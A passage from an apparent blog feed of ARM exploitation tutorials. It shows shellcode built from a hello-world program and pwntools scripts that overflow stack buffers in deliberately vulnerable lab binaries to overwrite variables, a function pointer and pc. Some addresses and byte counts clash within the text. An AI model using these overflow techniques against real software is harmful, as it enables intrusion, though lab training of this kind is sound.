0x65, 0x6c, 0x6c, 0x6f, 0x0a, 0x00, 0x00 <span class="o">}</span><span class="p">;</span> unsigned int hello_bin_len <span class="o">=</span> 36<span class="p">;</span> root@azeria-labs-arm:~/arm/hello# hexdump <span class="nt">-v</span> <span class="nt">-e</span> <span class="s1">' "\\x" 1/1 "%02x"'</span> hello.bin <span class="se">\x</span>01<span class="se">\x</span>60<span class="se">\x</span>8f<span class="se">\x</span>e2<span class="se">\x</span>16<span class="se">\x</span>ff<span class="se">\x</span>2f<span class="se">\x</span>e1<span class="se">\x</span>06<span class="se">\x</span>22<span class="se">\x</span>79<span class="se">\x</span>46<span class="se">\x</span>0e<span class="se">\x</span>31<span class="se">\x</span>01<span class="se">\x</span>20<span class="se">\x</span>04<span class="se">\x</span>27<span class="se">\x</span>01<span class="se">\x</span><span class="nb">df</span><span class="se">\x</span>24<span class="se">\x</span>1b<span class="se">\x</span>20<span class="se">\x</span>1c<span class="se">\x</span>01<span class="se">\x</span>27<span class="se">\x</span>01<span class="se">\x</span><span class="nb">df</span><span class="se">\x</span>68<span class="se">\x</span>65<span class="se">\x</span>6c<span class="se">\x</span>6c<span class="se">\x</span>6f<span class="se">\x</span>0a<span class="se">\x</span>00<span class="se">\x</span>00 </code></pre> </div> <p>We can directly use that <code>hello.bin</code> in <a href="https://github.com/odzhan/shellcode">odzhan/shellcode</a>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@azeria-labs-arm:~/arm/hello# ~/shellcode/runsc <span class="nt">-f</span> ./hello.bin <span class="nt">-x</span> <span class="o">[</span> run shellcode v0.2 <span class="o">[</span> reading code from ./hello.bin <span class="o">[</span> executing code...hello </code></pre> </div> <p>We now have a valid shellcode, ready to be used within string manipulation functions such as <code>srtcpy</code> or <code>fgets</code> as we encountered previously in this series.</p> security cybersecurity assembly hextrace Sat, 30 Jan 2021 19:27:34 +0000 https://dev.to/hextrace/arm-assembly-hello-world-33ep https://dev.to/hextrace/arm-assembly-hello-world-33ep <p>ARM architecture was originally designed for an Acorn computer and meant Acorn Risc Machine. It has then become an independent brand for embeeded systems and actually means Advanced RISC Architecture. ARM Cores implement an additional instruction set called THUMB encoded in 16 bits.</p> <p>Let's write an Hello World program in ARM:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.text .global _start _start: mov r2, #6 @ strlen mov r1, pc @ load pc add r1, #24 @ add str offset from pc mov r0, #1 @ stdout mov r7, #4 @ nr_write svc 0 @ syscall mov r0, #0 @ exit_success mov r7, #1 @ nr_exit svc 0 @ syscall .asciz "hello\n" @ null terminated string </code></pre> </div> <p>We have one function <code>_start</code> known as default entrypoint in one code section <code>.text</code>.</p> <p>Then we have two blocks, one for writing, one for exiting (optional).</p> <p>Registers r0 to r3 are used for parameter passing. Register r7 holds the syscall number</p> <p>Let's assemble, link and run:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@azeria-labs-arm:~/arm/hello# make as hello.s <span class="nt">-o</span> hello.o ld hello.o <span class="nt">-o</span> hello root@azeria-labs-arm:~/arm/hello# file ./hello ./hello: ELF 32-bit LSB executable, ARM, EABI5 version 1 <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, not stripped root@azeria-labs-arm:~/arm/hello# ./hello hello </code></pre> </div> <p>Awesome, this is our first step to shellcode development.</p> programming asm arm hextrace Sat, 30 Jan 2021 17:25:05 +0000 https://dev.to/hextrace/arm-rewrite-pc-2opb https://dev.to/hextrace/arm-rewrite-pc-2opb <p>In this article, we'll rewrite the <code>pc</code> register to take control of the program flow. This can be done though the vulnerable <code>gets</code> function</p> <p>The source:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; </span> <span class="kt">void</span> <span class="nf">win</span><span class="p">()</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"congrats!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"nope</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>The goal will be to call <code>win</code> by abusing <code>gets</code>.</p> <p>The disassembly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>00010404 &lt;win&gt;: 10404: b580 push {r7, lr} 10406: af00 add r7, sp, #0 10408: 4b03 ldr r3, [pc, #12] ; (10418 &lt;win+0x14&gt;) 1040a: 447b add r3, pc 1040c: 4618 mov r0, r3 1040e: f7ff ef82 blx 10314 &lt;puts@plt&gt; ; puts("congrats\n"); 10412: bf00 nop 10414: bd80 pop {r7, pc} 10416: bf00 nop 10418: 00000086 0001041c &lt;main&gt;: 1041c: b580 push {r7, lr} 1041e: b090 sub sp, #64 ; 0x40 10420: af00 add r7, sp, #0 10422: 463b mov r3, r7 10424: 4618 mov r0, r3 10426: f7ff ef70 blx 10308 &lt;gets@plt&gt; ; gets(buffer); 1042a: 4b05 ldr r3, [pc, #20] ; (10440 &lt;main+0x24&gt;) 1042c: 447b add r3, pc 1042e: 4618 mov r0, r3 10430: f7ff ef70 blx 10314 &lt;puts@plt&gt; 10434: 2300 movs r3, #0 10436: 4618 mov r0, r3 10438: 3740 adds r7, #64 ; 0x40 1043a: 46bd mov sp, r7 1043c: bd80 pop {r7, pc} ; pc to be overwritten 1043e: bf00 nop 10440: 00000070 </code></pre> </div> <p>This is our exploit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">import</span> <span class="nn">struct</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'192.168.0.1'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">60</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span><span class="p">(</span><span class="s">'test'</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="mh">0x00010404</span><span class="p">)</span> <span class="n">process</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'/root/protostarm/stack4/stack4'</span><span class="p">)</span> <span class="n">process</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">res</span> <span class="o">=</span> <span class="s">""</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">res</span> <span class="o">+=</span> <span class="n">process</span><span class="p">.</span><span class="n">recv</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="k">except</span><span class="p">:</span> <span class="k">break</span> <span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="k">if</span> <span class="s">'congrats'</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> <span class="k">break</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="n">socket</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>user@Azeria-Lab-VM:~/protoarm/stack4$ ./exploit.py [+] Connecting to 192.168.0.1 on port 22: Done [*] root@192.168.0.1: Distro Debian testing OS: linux Arch: arm Version: 4.9.0 ASLR: Disabled [*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1185) test 63 [+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1189 [*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1189) test 64 [+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1193 [*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1193) test 65 [+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1197 [*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1197) test 66 [+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1201 [*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1201) test 67 [+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1205 [*] Stopped remote process 'stack4' on 192.168.0.1 (pid 1205) test 68 [+] Starting remote process '/root/protostarm/stack4/stack4' on 192.168.0.1: pid 1209 congrats! [*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1597) [*] Closed connection to '192.168.0.1' </code></pre> </div> <p>Why 68? Well 64 for the buffer and 4 more for r7, the saved frame ptr.</p> security beginners hextrace Sat, 30 Jan 2021 12:23:43 +0000 https://dev.to/hextrace/hack-control-flow-arm-sbof-546f https://dev.to/hextrace/hack-control-flow-arm-sbof-546f <p>In this episode of the ProtoARM series, we'll exploit a vulnerable program to change the 'normal' control flow. This is the vulnerable source:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; </span> <span class="kt">void</span> <span class="nf">win</span><span class="p">()</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"congrats</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">volatile</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fp</span><span class="p">)()</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">fp</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"jump to 0x%08x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span> <span class="n">fp</span><span class="p">();</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Let's read the assembly of those two functions:</p> <p>win function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>00000564 &lt;win&gt;: prolog: 564: b580 push {r7, lr} 566: af00 add r7, sp, #0 good_boy: 568: 4b03 ldr r3, [pc, #12] ; (578 &lt;win+0x14&gt;) 56a: 447b add r3, pc 56c: 4618 mov r0, r3 56e: f7ff ef5a blx 424 &lt;puts@plt&gt; 572: bf00 nop epilog: 574: bd80 pop {r7, pc} 576: bf00 nop string_pool: 578: 00000096 </code></pre> </div> <p>This function simply prints a message. Its address is 0x0564, there is some padding in the form of <code>nop</code>s.</p> <p>main function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0000057c &lt;main&gt;: prolog: 57c: b580 push {r7, lr} 57e: b092 sub sp, #72 ; 0x48 580: af00 add r7, sp, #0 582: 2300 movs r3, #0 584: 647b str r3, [r7, #68] ; fp = NULL 586: 1d3b adds r3, r7, #4 588: 4618 mov r0, r3 ; r0 = buffer 58a: f7ff ef46 blx 418 &lt;gets@plt&gt; ; gets(buffer); 58e: 6c7b ldr r3, [r7, #68] ; r3 = fp 590: 2b00 cmp r3, #0 ; fp == NULL? 592: d007 beq.n 5a4 &lt;main+0x28&gt; 594: 6c79 ldr r1, [r7, #68] ; l1 = fp 596: 4b06 ldr r3, [pc, #24] ; (5b0 &lt;main+0x34&gt;) 598: 447b add r3, pc 59a: 4618 mov r0, r3 ; r0 = fmt 59c: f7ff ef36 blx 40c &lt;printf@plt&gt; ; printf("jump to 0x%08\n", fp); 5a0: 6c7b ldr r3, [r7, #68] ; r3 = fp 5a2: 4798 blx r3 ; jump to fp exit_success: 5a4: 2300 movs r3, #0 5a6: 4618 mov r0, r3 epilog: 5a8: 3748 adds r7, #72 ; 0x48 5aa: 46bd mov sp, r7 5ac: bd80 pop {r7, pc} 5ae: bf00 nop 5b0: 00000074 andeq r0, r0, r4, ror r0 </code></pre> </div> <p>A <code>buffer</code> overflow will overwrite the function pointer allowing the user to jump to an arbitrary location.</p> <p>Here is the exploit we can use. The payload contains sufficient amout of A's to fill the buffer and the address of <code>win</code> so it properly overwrites the <code>fp</code> variable:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">import</span> <span class="nn">struct</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'192.168.0.1'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">60</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span><span class="p">(</span><span class="s">'test'</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="mh">0x00010435</span><span class="p">)</span> <span class="n">process</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'/root/protostarm/stack3/stack3'</span><span class="p">)</span> <span class="n">process</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">res</span> <span class="o">=</span> <span class="s">""</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">res</span> <span class="o">+=</span> <span class="n">process</span><span class="p">.</span><span class="n">recv</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="k">except</span><span class="p">:</span> <span class="k">break</span> <span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="k">if</span> <span class="s">'congrats'</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> <span class="k">break</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="n">socket</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>user@Azeria-Lab-VM:~/protoarm/stack3$ ./exploit.py [+] Connecting to 192.168.0.1 on port 22: Done [*] root@192.168.0.1: Distro Debian testing OS: linux Arch: arm Version: 4.9.0 ASLR: Enabled test 61 [+] Starting remote process '/root/protostarm/stack3/stack3' on 192.168.0.1: pid 1565 [*] Stopped remote process 'stack3' on 192.168.0.1 (pid 1565) test 62 [+] Starting remote process '/root/protostarm/stack3/stack3' on 192.168.0.1: pid 1569 jump to 0x00000001 [*] Stopped remote process 'stack3' on 192.168.0.1 (pid 1569) test 63 [+] Starting remote process '/root/protostarm/stack3/stack3' on 192.168.0.1: pid 1573 jump to 0x00000104 [*] Stopped remote process 'stack3' on 192.168.0.1 (pid 1573) test 64 [+] Starting remote process '/root/protostarm/stack3/stack3' on 192.168.0.1: pid 1577 jump to 0x00010435 congrats [*] Closed connection to '192.168.0.1' </code></pre> </div> <p>Congrats! Next we'll discover how we can modify control flow without <code>fp</code>, but directly using the <code>pc</code> register.</p> security beginners hextrace Fri, 29 Jan 2021 19:26:35 +0000 https://dev.to/hextrace/arm-bof-exploit-via-pwntools-2l81 https://dev.to/hextrace/arm-bof-exploit-via-pwntools-2l81 <p>This is our source code for the third exploit of this series on ARM hacking:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;err.h&gt; </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">vulnerable</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span> <span class="kt">char</span> <span class="o">*</span><span class="n">var</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="s">"POC"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">var</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"set POC!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">vulnerable</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">var</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">vulnerable</span> <span class="o">!=</span> <span class="mh">0xdeadbeef</span><span class="p">)</span> <span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"nope</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"congrats!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>Our goal will be to understand ARM implementation of this, to identify the vulnerability and to exploit it!</p> <p>The program disassembly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>000005bc &lt;main&gt;: prolog: 5bc: b580 push {r7, lr} 5be: b092 sub sp, #72 ; 0x48 bytes stackframe 5c0: af00 add r7, sp, #0 5c2: 232a movs r3, #42 ; 0x2a ; r3 = 42 5c4: 647b str r3, [r7, #68] ; store 42 at first int in stack 5c6: 463b mov r3, r7 ; buffer is at the other end of the stackframe 5c8: 2240 movs r2, #64 ; r2 = 64 5ca: 2100 movs r1, #0 ; r1 = '\0' 5cc: 4618 mov r0, r3 ; r0 = buffer 5ce: f7ff ef5c blx 488 &lt;memset@plt&gt; ; memset(buffer, '\0', 64); // bzero buffer 5d2: 4b16 ldr r3, [pc, #88] ; (62c &lt;main+0x70&gt;) 5d4: 447b add r3, pc 5d6: 4618 mov r0, r3 5d8: f7ff ef3e blx 458 &lt;getenv@plt&gt; ; getenv("POC"); 5dc: 6438 str r0, [r7, #64] ; r7 = var 5de: 6c3b ldr r3, [r7, #64] ; r3 = *var 5e0: 2b00 cmp r3, #0 ; var == NULL? 5e2: d105 bne.n 5f0 &lt;main+0x34&gt; poc_not_set: 5e4: 4b12 ldr r3, [pc, #72] ; (630 &lt;main+0x74&gt;) 5e6: 447b add r3, pc 5e8: 4619 mov r1, r3 ; r3 = "set POC!\n" 5ea: 2001 movs r0, #1 ; r0 = 1 5ec: f7ff ef52 blx 494 &lt;errx@plt&gt; ; errx(1, "set POC\n"); copy_in_buffer: 5f0: 232a movs r3, #42 ; r3 = 42 5f2: 647b str r3, [r7, #68] ; vulnerable = 42 (oops, I initialized twice, see 0x5c4!) 5f4: 463b mov r3, r7 ; r3 = 42 5f6: 6c39 ldr r1, [r7, #64] ; r1 = buffer 5f8: 4618 mov r0, r3 ; r0 = var 5fa: f7ff ef28 blx 44c &lt;strcpy@plt&gt; ; strcpy(buffer, var); 5fe: 6c7a ldr r2, [r7, #68] ; r2 = vulnerable 600: f64b 63ef movw r3, #48879 ; 0xbeef 604: f6cd 63ad movt r3, #57005 ; 0xdead 608: 429a cmp r2, r3 ; vulnerable == 0xdeadbeef? 60a: d005 beq.n 618 &lt;main+0x5c&gt; bad_boy: 60c: 4b09 ldr r3, [pc, #36] ; (634 &lt;main+0x78&gt;) 60e: 447b add r3, pc 610: 4619 mov r1, r3 ; r1 = "nope\n" 612: 2001 movs r0, #1 ; r0 = 1 614: f7ff ef3e blx 494 &lt;errx@plt&gt; ; errx(1, "nope\n"); good_boy: 618: 4b07 ldr r3, [pc, #28] ; (638 &lt;main+0x7c&gt;) 61a: 447b add r3, pc 61c: 4618 mov r0, r3 ; r0 = "congrats!\n"); 61e: f7ff ef22 blx 464 &lt;puts@plt&gt; ; puts("congrats\n"); 622: 2300 movs r3, #0 624: 4618 mov r0, r3 ; return EXIT_SUCCESS; epilog: 626: 3748 adds r7, #72 ; 0x48 628: 46bd mov sp, r7 62a: bd80 pop {r7, pc} string_pool: 62c: 000000b4 630: 000000a6 634: 0000008a 638: 00000086 </code></pre> </div> <p>Here is an exploit using <code>pwntools</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">import</span> <span class="nn">struct</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'192.168.0.1'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">64</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span><span class="p">(</span><span class="s">'test'</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="mh">0xdeadbeef</span><span class="p">)</span> <span class="n">process</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">process</span><span class="p">(</span> <span class="n">executable</span><span class="o">=</span><span class="s">'/root/protostarm/stack2/stack2'</span><span class="p">,</span> <span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s">"POC"</span><span class="p">:</span> <span class="n">payload</span><span class="p">}</span> <span class="p">)</span> <span class="n">res</span> <span class="o">=</span> <span class="n">process</span><span class="p">.</span><span class="n">recv</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="k">print</span><span class="p">(</span><span class="s">'res ='</span><span class="p">,</span> <span class="n">res</span><span class="p">)</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="k">if</span> <span class="s">'congrats'</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> <span class="k">break</span> <span class="n">socket</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <p>Our vulnerable variable is stored at sp+68. <code>strcpy</code> will copy our <code>var</code> including the terninating null byte ('\0'). We such need to fill the stack with 69 bytes before overwriting the vulnerable variable:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>user@Azeria-Lab-VM:~/protoarm/stack2<span class="nv">$ </span>./exploit.py <span class="o">[</span>+] Connecting to 192.168.0.1 on port 22: Done <span class="o">[</span><span class="k">*</span><span class="o">]</span> root@192.168.0.1: Distro Debian testing OS: linux Arch: arm Version: 4.9.0 ASLR: Enabled <span class="nb">test </span>65 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack2/stack2'</span> on 192.168.0.1: pid 740 res <span class="o">=</span> : <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack2'</span> on 192.168.0.1 <span class="o">(</span>pid 740<span class="o">)</span> <span class="nb">test </span>66 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack2/stack2'</span> on 192.168.0.1: pid 744 res <span class="o">=</span> : <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack2'</span> on 192.168.0.1 <span class="o">(</span>pid 744<span class="o">)</span> <span class="nb">test </span>67 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack2/stack2'</span> on 192.168.0.1: pid 748 res <span class="o">=</span> : <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack2'</span> on 192.168.0.1 <span class="o">(</span>pid 748<span class="o">)</span> <span class="nb">test </span>68 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack2/stack2'</span> on 192.168.0.1: pid 752 res <span class="o">=</span> congrats! <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack2'</span> on 192.168.0.1 <span class="o">(</span>pid 752<span class="o">)</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Closed connection to <span class="s1">'192.168.0.1'</span> </code></pre> </div> <p>A more secure version of this program could use <code>strncpy</code> in place of <code>strcpy</code>. Here is a pseudo implem of it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>char *strncpy(char *dest, const char *src, size_t n) { size_t i = 0; // fill dest buffe with at most n bytes preventing bof if n is well chosen for (i = 0; i &lt; n &amp;&amp; src[i] != '\0'; i++) dest[i] = src[i]; // fill the rest of the buffer with null bytes for ( ; i &lt; n; i++) dest[i] = '\0'; return dest; } </code></pre> </div> <p>There are other alternatives such as <code>strlcpy</code>, <code>strcpy_s</code>, and many more.</p> <p>I hope you enjoyed it!</p> security python beginners challenge hextrace Thu, 28 Jan 2021 19:38:31 +0000 https://dev.to/hextrace/arm-bof-uberwrite-stack-data-mo4 https://dev.to/hextrace/arm-bof-uberwrite-stack-data-mo4 <p>In this second protoarm exercise, we'll exploit a buffer overflow to write arbitary data onto the stack. The goal is to rewrite the <code>vulnerable</code> integer to <code>0xcafebabe</code>. Here is the vulnerable program:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;err.h&gt; </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="k">volatile</span> <span class="kt">int</span> <span class="n">vulnerable</span><span class="p">;</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"argument missing</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">vulnerable</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="k">if</span> <span class="p">(</span><span class="n">vulnerable</span> <span class="o">==</span> <span class="mh">0xcafebabe</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"congratulations</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"nope"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>We can write the following exploit, based on the previous one:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">import</span> <span class="nn">struct</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'192.168.0.1'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">60</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span><span class="p">(</span><span class="s">'test'</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="mh">0x61626364</span><span class="p">)</span> <span class="n">process</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">process</span><span class="p">(</span> <span class="n">argv</span><span class="o">=</span><span class="p">[</span><span class="s">'/root/protostarm/stack1/stack1'</span><span class="p">,</span> <span class="n">payload</span> <span class="p">],</span> <span class="p">)</span> <span class="n">res</span> <span 